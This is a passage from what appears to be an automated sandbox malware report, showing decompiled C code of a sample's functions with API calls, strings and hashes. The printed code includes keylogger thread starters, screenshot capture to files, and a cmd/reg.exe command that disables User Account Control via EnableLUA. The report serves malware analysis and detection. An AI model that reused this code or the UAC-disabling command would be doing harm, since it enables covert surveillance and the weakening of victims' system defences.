						}
					} else {
						_push(_t3);
						L4:
						L0043EE85();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E0043E5DA(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x46a1e0; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = L0043DFD9(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = L00440F8E(_t27, _t37, __eflags,  *0x46a1e0, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E004407E4(_t27, _t32, 0x46b654);
									L0043EE85(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								L0043EE85();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = L00440F38(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = L00440F38(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00440972
0x00440972
0x00440972
0x0044097c
0x0044097e
0x00440983
0x00440986
0x00440994
0x0044099b
0x004409a0
0x004409a3
0x004409a6
0x004409b8
0x004409bd
0x004409bf
0x004409ca
0x004409d1
0x004409d6
0x004409d9
0x004409db
0x00000000
0x00000000
0x00000000
0x00000000
0x004409c1
0x004409c1
0x00000000
0x004409c1
0x004409a8
0x004409a8
0x004409a9
0x004409a9
0x004409ae
0x004409e9
0x004409ea
0x004409f0
0x004409f5
0x004409f8
0x004409f9
0x004409fa
0x00440a01
0x00440a03
0x00440a05
0x00440a0a
0x00440a0d
0x00440a1b
0x00440a27
0x00440a2a
0x00440a2d
0x00440a3f
0x00440a44
0x00440a46
0x00440a51
0x00440a57
0x00440a5f
0x00440a61
0x00000000
0x00000000
0x00000000
0x00000000
0x00440a48
0x00440a48
0x00000000
0x00440a48
0x00440a2f
0x00440a2f
0x00440a30
0x00440a30
0x00440a63
0x00440a64
0x00440a64
0x00440a0f
0x00440a15
0x00440a19
0x00440a6c
0x00440a6d
0x00440a73
0x00000000
0x00000000
0x00000000
0x00440a19
0x00440a7a
0x00440a7a
0x00440988
0x0044098e
0x00440992
0x004409dd
0x004409de
0x004409e8
0x00000000
0x00000000
0x00000000
0x00440992

APIs

GetLastError.KERNEL32(?,?,00434E55,?,?,?,00435444,0043609C,?,0046C238), ref: 00440976
_free.LIBCMT ref: 004409A9
_free.LIBCMT ref: 004409D1
SetLastError.KERNEL32(00000000,?,0046C238,?,?,?,?,?,?,?,?,?,0043609C,00000000,00412AA2,00000000), ref: 004409DE
SetLastError.KERNEL32(00000000,?,0046C238,?,?,?,?,?,?,?,?,?,0043609C,00000000,00412AA2,00000000), ref: 004409EA
_abort.LIBCMT ref: 004409F0

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 19877d3d14e59a494c44e4fde6bb29c47705ca6ce07b5f93ecaa518254929c4a
Instruction ID: a31c51b4580a199ad3038d9a62967fb3efd0f479f4e7b394ce716d3395aa3357
Opcode Fuzzy Hash: 19877d3d14e59a494c44e4fde6bb29c47705ca6ce07b5f93ecaa518254929c4a
Instruction Fuzzy Hash: ACF0F976141A0037F61127666C06E5F1225ABC1BAAF24012FFA14A22D3EE7CCC2245AF

Uniqueness

Uniqueness Score: -1.00%

Function 0041B671, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0041B671(short* __edx) {
				signed int _v8;
				intOrPtr _v12;
				short* _v16;
				short _v20;
				char _v24;
				intOrPtr _v28;
				char _v80;
				void* _t45;
				void* _t48;
				void* _t59;
				intOrPtr _t62;
				void* _t64;
				intOrPtr _t65;
				void* _t67;
				char _t68;
				char _t69;
				char* _t70;
				signed int _t71;
				short* _t72;
				signed int _t76;
				char* _t79;
				char* _t81;
				intOrPtr _t82;
				char* _t85;
				void* _t86;
				void* _t89;
				intOrPtr _t91;
				char* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				_v16 = __edx;
				_v8 = _v8 & 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = L0040BE3C();
				_t85 = "TLS_AES_128_GCM_SHA256";
				if(__edx == 0) {
					L37:
					return 0;
				}
				_t45 = L00438E20(_t85, "ALL", 3);
				_t97 = _t96 + 0xc;
				if(_t45 == 0) {
					L36:
					return 1;
				}
				_t48 = L00438E20(_t85, "DEFAULT", 7);
				_t98 = _t97 + 0xc;
				if(_t48 == 0) {
					goto L36;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t85;
					_t86 = E004310F0(_t85, 0x4657e0);
					if(_t86 != 0) {
						_t76 = _t86 - _t70;
						L8:
						if(_t76 <= 0x31) {
							if(_t86 != 0) {
								_t89 = _t86 - _t70;
								L15:
								E0043A900( &_v80, _t70, _t89);
								_t98 = _t98 + 0xc;
								_t11 = _t89 - 1; // -1
								_t90 =  ==  ? _t11 : _t89;
								_t71 = 0;
								 *((char*)(_t95 + ( ==  ? _t11 : _t89) - 0x4c)) = 0;
								if(_v28 <= 0) {
									L20:
									_t72 = _v16;
									_t91 = _v12;
									goto L21;
								}
								_t93 = 0x4608fc;
								while(1) {
									_t15 = _t93 - 4; // 0x465d34
									_t59 = L00438E20( &_v80,  *_t15, 0x31);
									_t98 = _t98 + 0xc;
									if(_t59 == 0) {
										break;
									}
									_t67 = L00438E20( &_v80,  *_t93, 0x31);
									_t98 = _t98 + 0xc;
									if(_t67 == 0) {
										break;
									}
									_t71 = _t71 + 1;
									_t93 = _t93 + 0xc;
									if(_t71 < _v28) {
										continue;
									}
									goto L20;
								}
								_t82 = _v20;
								if(_t82 >= 0x12b) {
									goto L37;
								}
								_t76 = _t71 * 0xc;
								_t72 = _v16;
								 *((char*)(_t72 + _t82 + 4)) =  *((intOrPtr*)(_t76 + 0x460900));
								 *((char*)(_t72 + _t82 + 5)) =  *((intOrPtr*)(_t76 + 0x460901));
								_t62 =  *((intOrPtr*)(_t76 + 0x460900));
								_v20 = _t82 + 2;
								if(_t62 == 0x13) {
									L34:
									_v8 = 1;
									L35:
									_t91 = 1;
									_v12 = 1;
									goto L21;
								}
								if(_t62 != 0xc0) {
									L30:
									if(_v8 != 0) {
										L32:
										if(_v24 == 0) {
											_v24 = 1;
										}
										goto L35;
									}
									_t64 = E004310F0( &_v80, "ECDSA");
									_pop(_t76);
									if(_t64 != 0) {
										goto L34;
									}
									goto L32;
								}
								_t65 =  *((intOrPtr*)(_t76 + 0x460901));
								if(_t65 == 0xb4 || _t65 == 0xb5) {
									goto L34;
								} else {
									goto L30;
								}
							}
							_t92 = _t70;
							_t76 =  &(_t92[1]);
							do {
								_t68 =  *_t92;
								_t92 =  &(_t92[1]);
							} while (_t68 != 0);
							_t89 = _t92 - _t76;
							goto L15;
						}
						_t89 = 0x31;
						goto L15;
					}
					_t79 = _t70;
					_t81 =  &(_t79[1]);
					do {
						_t69 =  *_t79;
						_t79 =  &(_t79[1]);
					} while (_t69 != 0);
					_t76 = _t79 - _t81;
					goto L8;
					L21:
					_t85 = _t86 + 1;
				} while (_t86 != 0);
				if(_t91 != 0) {
					_push(_t76);
					 *_t72 = _v20;
					 *((char*)(_t72 + 0x154)) = 1;
					L00418C8B(_t72, _v8, _v24, _t76, 1);
				}
				return _t91;
			}

0x0041b67a
0x0041b67d
0x0041b683
0x0041b687
0x0041b68a
0x0041b692
0x0041b695
0x0041b69c
0x0041b83c
0x00000000
0x0041b83c
0x0041b6aa
0x0041b6af
0x0041b6b4
0x0041b837
0x00000000
0x0041b839
0x0041b6c2
0x0041b6c7
0x0041b6cc
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b6d2
0x0041b6d2
0x0041b6d8
0x0041b6df
0x0041b6e5
0x0041b6f9
0x0041b6fb
0x0041b6fe
0x0041b707
0x0041b71b
0x0041b71d
0x0041b723
0x0041b728
0x0041b72b
0x0041b731
0x0041b734
0x0041b736
0x0041b73e
0x0041b777
0x0041b777
0x0041b77a
0x00000000
0x0041b77a
0x0041b740
0x0041b745
0x0041b747
0x0041b74e
0x0041b753
0x0041b758
0x00000000
0x00000000
0x0041b762
0x0041b767
0x0041b76c
0x00000000
0x00000000
0x0041b76e
0x0041b76f
0x0041b775
0x00000000
0x00000000
0x00000000
0x0041b775
0x0041b7b5
0x0041b7be
0x00000000
0x00000000
0x0041b7c0
0x0041b7c3
0x0041b7cc
0x0041b7d6
0x0041b7dd
0x0041b7e3
0x0041b7e8
0x0041b825
0x0041b825
0x0041b82c
0x0041b82e
0x0041b82f
0x00000000
0x0041b82f
0x0041b7ec
0x0041b7fc
0x0041b800
0x0041b816
0x0041b81a
0x0041b81c
0x0041b81c
0x00000000
0x0041b81a
0x0041b80b
0x0041b811
0x0041b814
0x00000000
0x00000000
0x00000000
0x0041b814
0x0041b7ee
0x0041b7f6
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b7f6
0x0041b709
0x0041b70b
0x0041b70e
0x0041b70e
0x0041b710
0x0041b711
0x0041b715
0x00000000
0x0041b715
0x0041b702
0x00000000
0x0041b702
0x0041b6e7
0x0041b6e9
0x0041b6ec
0x0041b6ec
0x0041b6ee
0x0041b6ef
0x0041b6f3
0x00000000
0x0041b77d
0x0041b77f
0x0041b780
0x0041b78a
0x0041b792
0x0041b796
0x0041b79f
0x0041b7a6
0x0041b7ab
0x00000000

APIs

_strncpy.LIBCMT ref: 0041B723

Strings

ALL, xrefs: 0041B6A4
DEFAULT, xrefs: 0041B6BC
TLS_AES_128_GCM_SHA256, xrefs: 0041B695, 0041B6A9, 0041B6C1, 0041B6D7, 0041B71D, 0041B721
ECDSA, xrefs: 0041B805

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _strncpy
String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
API String ID: 2961919466-1012175531
Opcode ID: 78fa12b9f6d9d132d950df1abb8da17d93647f655761b6c6588f7c57589f5f63
Instruction ID: 78e21791db2732ee694d72da95f641054b580d27861932b645a039a5d5b4fa6f
Opcode Fuzzy Hash: 78fa12b9f6d9d132d950df1abb8da17d93647f655761b6c6588f7c57589f5f63
Instruction Fuzzy Hash: 2E513735D043099BDF20AAA888857FFB7B9DB44304F14406FEC51A7382E7798986C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041510D, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041510D(void* __ecx, void* __edx, void* __eflags) {
				char _v1048;
				char _v1056;
				char _v1092;
				void* _v1096;
				char _v1112;
				char _v1120;
				void* _v1124;
				void* _v1136;
				char _v1144;
				char _v1152;
				char _v1156;
				void* _v1160;
				char _v1184;
				char _v1200;
				void* _v1204;
				char _v1224;
				char _v1232;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t39;
				void* _t54;
				void* _t57;
				void* _t60;
				void* _t67;
				void* _t73;
				char* _t84;
				char* _t86;
				void* _t120;
				void* _t121;
				void* _t123;
				intOrPtr* _t124;
				signed int _t128;
				void* _t130;

				_t133 = __eflags;
				_t130 = (_t128 & 0xfffffff8) - 0x4b4;
				_t121 = __ecx;
				_t74 = __edx;
				E00403086(__edx,  &_v1184, E0040425F(__edx,  &_v1156, __ecx), _t121, __eflags, L"png");
				L00401ED0();
				E004142A5( &_v1120, __edx, __eflags, 0);
				_t84 =  &_v1120;
				_t39 =  *0x46bd10(L00401F75(_t84), E00402469(), _t120, _t123, _t73);
				_t124 = _t39;
				L00413DBA( &_v1144, _t124);
				_t86 = L"image/png";
				E00414611(_t86,  &_v1112);
				L00413E32(L00401ECB( &_v1200),  &_v1152, _t43,  &_v1112);
				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
				if( *((char*)(L00401F75(L00401E29(0x46c578,  &_v1112, _t133, 0x1b)))) == 1) {
					E004020B5(__edx,  &_v1224);
					_t54 = E00417334(L00401ECB( &_v1200),  &_v1224);
					_t135 = _t54;
					if(_t54 != 0) {
						DeleteFileW(L00401ECB( &_v1200));
						_t57 = E00402469();
						E00405A2F( &_v1048, L00401F75(0x46c560), _t57);
						_t60 = E00402469();
						L00405B57(_t74,  &_v1056,  &_v1224,  &_v1184, L00401F75( &_v1232), _t60);
						E00403086(_t74,  &_v1120, E0040425F(_t74,  &_v1092, _t121), _t121, _t135, L"dat");
						L00401ED0();
						_t67 = L00401ECB( &_v1120);
						E004020CC(_t74, _t130 - 0x18, _t64, _t135,  &_v1200);
						E004173A6(_t67);
						L00401ED0();
						L00401FA7();
					}
					_t48 = L00401FA7();
				}
				L00413DE0(_t48,  &_v1152);
				L00401FA7();
				return L00401ED0();
			}

0x0041510d
0x00415113
0x0041511c
0x0041511e
0x00415135
0x0041513f
0x0041514c
0x0041515c
0x00415166
0x0041516d
0x00415174
0x00415180
0x00415185
0x004151a1
0x004151a9
0x004151c2
0x004151cc
0x004151e0
0x004151e5
0x004151e7
0x004151f7
0x00415204
0x00415219
0x00415222
0x0041523e
0x0041525e
0x0041526b
0x00415277
0x00415288
0x0041528f
0x0041529e
0x004152a7
0x004152a7
0x004152b0
0x004152b0
0x004152b9
0x004152c2
0x004152d6

APIs

Part of subcall function 004142A5: CreateDCA.GDI32 ref: 004142C0
Part of subcall function 004142A5: CreateCompatibleDC.GDI32(00000000), ref: 004142CC

SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 00415166

Part of subcall function 00413DBA: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00413DD0

Part of subcall function 00413E32: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 00413E43

Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,0041309D), ref: 00417351

DeleteFileW.KERNEL32(00000000,0000001B), ref: 004151F7

Strings

image/png, xrefs: 00415180
png, xrefs: 00415120
dat, xrefs: 00415243

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
String ID: dat$image/png$png
API String ID: 1095564277-186023265
Opcode ID: a753974da9b5e85d49f0359ac3b9dfc192b4894ed49b174ff6209cd4059f0f8a
Instruction ID: ec78f574bbb469ede11c5765e841e4de501cabfd3cecff2c18e23e093a1ab6d9
Opcode Fuzzy Hash: a753974da9b5e85d49f0359ac3b9dfc192b4894ed49b174ff6209cd4059f0f8a
Instruction Fuzzy Hash: 9B4164721043405AC314FB62DC56DEFB7A9AF91348F40093FF586671E2EF385A49CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408744, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70
threadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00408744(void* __ecx, char _a4) {
				char _v28;
				char _v32;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* _t21;
				void* _t39;
				signed int _t41;
				void* _t43;

				_t43 = (_t41 & 0xfffffff8) - 0x1c;
				_push(_t21);
				_t39 = __ecx;
				 *((char*)(__ecx + 0x49)) = 1;
				L00409DD4(__ecx + 0x60,  &_a4);
				_t47 =  *0x46a9d4 - 0x32;
				_t35 = "Offline Keylogger Started";
				if( *0x46a9d4 != 0x32) {
					E00402064(_t21,  &_v28, "Offline Keylogger Started");
					_t43 = _t43 - 0x18;
					L00416C32(_t43,  &_v32);
					E00409636(_t21, _t39, _t47);
					L00401FA7();
				}
				_t44 = _t43 - 0x18;
				E00402064(_t21, _t43 - 0x18, _t35);
				E00402064(_t21, _t44 - 0x18, "[Info]");
				E004165D8(_t21, _t35);
				CreateThread(0, 0, E0040884D, _t39, 0, 0);
				if( *_t39 == 0) {
					CreateThread(0, 0, E00408832, _t39, 0, 0);
				}
				CreateThread(0, 0, E0040885C, _t39, 0, 0);
				return L00401ED0();
			}

0x0040874a
0x00408750
0x00408752
0x00408759
0x0040875d
0x00408762
0x00408769
0x0040876e
0x00408775
0x0040877a
0x00408783
0x0040878a
0x00408793
0x00408793
0x00408798
0x0040879e
0x004087ad
0x004087b2
0x004087cc
0x004087d0
0x004087dc
0x004087dc
0x004087e8
0x004087f8

APIs

CreateThread.KERNEL32 ref: 004087CC
CreateThread.KERNEL32 ref: 004087DC
CreateThread.KERNEL32 ref: 004087E8

Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409644
Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
Part of subcall function 00409636: SetEvent.KERNEL32(?,00000000), ref: 004096EF

Strings

[Info], xrefs: 004087A8
Offline Keylogger Started, xrefs: 00408769, 00408770, 0040879D

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CreateThread$EventLocalTimewsprintf
String ID: Offline Keylogger Started$[Info]
API String ID: 3534694722-3531117058
Opcode ID: 4434c6f6a80446e7f625bb7d24727a20aa772383ea87c81626a51511d4f62225
Instruction ID: 917e057f81a48fe8b587d187e59d983f8dfdf23781fe50dc9a014371862e48e5
Opcode Fuzzy Hash: 4434c6f6a80446e7f625bb7d24727a20aa772383ea87c81626a51511d4f62225
Instruction Fuzzy Hash: AB1198A25003083AD224B7369D86DBF3A5DDA81398F80453FF985221C3DE785E08C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 004093AF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65
threadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004093AF(void* __ecx) {
				char _v28;
				void* __ebx;
				void* __edi;
				void* _t7;
				void* _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t30 = __ecx;
				_t36 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					_t28 = "Online Keylogger Started";
					 *((char*)(__ecx + 0x4a)) = 1;
					E00402064(_t18,  &_v28, "Online Keylogger Started");
					_t32 = _t31 - 0x18;
					L00416C32(_t32,  &_v28);
					E00409636(_t18, _t30, _t36);
					L00401FA7();
					_t33 = _t32 - 0x18;
					E00402064(_t18, _t32 - 0x18, "Online Keylogger Started");
					E00402064(_t18, _t33 - 0x18, "[Info]");
					E004165D8(_t18, _t28);
					if( *((intOrPtr*)(_t30 + 0x49)) == 0) {
						if( *_t30 == 0) {
							CreateThread(0, 0, E00408832, _t30, 0, 0);
						}
						CreateThread(0, 0, E0040885C, _t30, 0, 0);
					}
					return CreateThread(0, 0, E0040886B, _t30, 0, 0);
				}
				return _t7;
			}

0x004093b7
0x004093ba
0x004093be
0x004093c4
0x004093c9
0x004093d1
0x004093d6
0x004093de
0x004093e5
0x004093ed
0x004093f2
0x004093f8
0x00409407
0x0040940c
0x0040941f
0x00409423
0x0040942f
0x0040942f
0x0040943b
0x0040943b
0x00000000
0x00409447
0x0040944f

APIs

Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409644
Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
Part of subcall function 00409636: SetEvent.KERNEL32(?,00000000), ref: 004096EF

Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2

CreateThread.KERNEL32 ref: 0040942F
CreateThread.KERNEL32 ref: 0040943B
CreateThread.KERNEL32 ref: 00409447

Strings

[Info], xrefs: 00409402
Online Keylogger Started, xrefs: 004093C4, 004093CD, 004093F7

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$Eventwsprintf
String ID: Online Keylogger Started$[Info]
API String ID: 3546759147-3401407043
Opcode ID: d5ef2fa22888c70407686bac2772e6180c9c4be3998c28610beb8ed2f337d255
Instruction ID: 8fb703469506888dfee9d4bbb0c2098ebf9b351c4befbe7097037b3d6031c6da
Opcode Fuzzy Hash: d5ef2fa22888c70407686bac2772e6180c9c4be3998c28610beb8ed2f337d255
Instruction Fuzzy Hash: 0101A591A003183AD62076765D8BD7F7A5DCA82398F80447FFA81322C3D97D5D0982FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418732, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00418732() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				void* __edi;
				struct HWND__* _t20;
				void* _t23;

				E00431810(_t23,  &(_v68.style), 0, 0x2c);
				_v68.cbSize = 0x30;
				_v68.style = 0;
				_v68.lpfnWndProc = E004187B2;
				_v68.cbClsExtra = 0;
				asm("movsd");
				_v68.lpszClassName =  &_v20;
				_v68.cbWndExtra = 0;
				asm("movsd");
				_v68.lpszMenuName = 0;
				asm("movsd");
				asm("movsw");
				asm("movsb");
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t20 == 0) {
					GetLastError();
					goto L3;
				}
				return _t20;
			}

0x00418744
0x0041874e
0x00418758
0x0041875e
0x00418768
0x0041876b
0x0041876c
0x00418773
0x00418776
0x00418777
0x0041877a
0x0041877b
0x0041877d
0x00418787
0x004187a9
0x00000000
0x004187a9
0x00418799
0x004187a1
0x004187a3
0x00000000
0x004187a3
0x004187b1

APIs

RegisterClassExA.USER32(00000030), ref: 0041877E
CreateWindowExA.USER32 ref: 00418799
GetLastError.KERNEL32 ref: 004187A3

Strings

0, xrefs: 0041874E
MsgWindowClass, xrefs: 00418749

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 701e24ee285bda8c92aaa415a52cb06df6bf337d7b551747502d98f6e9839a02
Instruction ID: 39839075c33bffd586aacb37a79c17ebe23a35f30f2176b7e199aa3a0e24e00b
Opcode Fuzzy Hash: 701e24ee285bda8c92aaa415a52cb06df6bf337d7b551747502d98f6e9839a02
Instruction Fuzzy Hash: 150125B5D0021CABDB00DFE5DC849EFBBBCFB04395F50493AF814A6240EB749A058AA4

Uniqueness

Uniqueness Score: -1.00%

Function 00432621, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 19%

			E00432621(void* __ebx, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				intOrPtr _t24;
				void* _t26;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				intOrPtr* _t31;
				void* _t33;

				_t28 = __edx;
				_t26 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_t5 =  &_a4; // 0x432a4d
					_push( *_t5);
					L00432C70(_t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_t7 =  &_a4; // 0x432a4d
				_push( *_t7);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				L00431BFB(_t27);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				L00432E72(_t26, _t27, _t28, _t29, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_t24 = _a24;
				_push( *((intOrPtr*)(_t24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				"j8h8~F"();
				if(_t24 != 0) {
					L00431BC9(_t24, _t29);
					return _t24;
				}
				return _t24;
			}

0x00432621
0x00432621
0x00432624
0x00432629
0x0043262c
0x0043262e
0x00432631
0x00432634
0x00432635
0x00432635
0x00432638
0x0043263d
0x0043263d
0x00432640
0x00432644
0x00432644
0x00432647
0x0043264c
0x00432649
0x00432649
0x00432649
0x0043264f
0x00432655
0x00432658
0x0043265a
0x0043265d
0x00432660
0x00432661
0x0043266a
0x0043266f
0x00432672
0x00432675
0x00432678
0x0043267b
0x0043267e
0x00432681
0x00432682
0x00432685
0x00432690
0x00432694
0x00000000
0x00432694
0x0043269b

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00432638

Part of subcall function 00432C70: ___AdjustPointer.LIBCMT ref: 00432CBA

_UnwindNestedFrames.LIBCMT ref: 0043264F
___FrameUnwindToState.LIBVCRUNTIME ref: 00432661
CallCatchBlock.LIBVCRUNTIME ref: 00432685

Strings

M*C, xrefs: 00432644, 00432635

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: M*C
API String ID: 2633735394-129833859
Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
Instruction ID: 2b136e0aa6985e1208fe7cf03fe17269dead03c225157b686541d69b99605fa0
Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
Instruction Fuzzy Hash: 5B016932000108BBCF126F56CD02EDA3BBAFF4D714F10501AF95861121C37AE861DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D797, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040D797() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v92;
				void* __edi;
				void* _t17;
				long _t19;

				_t19 = 0x44;
				E00431810(_t17,  &_v92, 0, _t19);
				_v92.cb = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}

0x0040d7a2
0x0040d7ab
0x0040d7b2
0x0040d7bb
0x0040d7bc
0x0040d7bd
0x0040d7be
0x0040d7db
0x0040d7ea
0x0040d7f7

APIs

CreateProcessA.KERNEL32 ref: 0040D7DB
CloseHandle.KERNEL32(0040C964), ref: 0040D7EA
CloseHandle.KERNEL32(00000027), ref: 0040D7EF

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040D7D6
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D7D1

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: f7bd64f0aa5cc713437930bcea8c593d52bea72142ba88d224d3689b8af6da83
Instruction ID: 787108f511e4318509bc76900ce72c09bd06e2e4a50587c84678304a4fe04e77
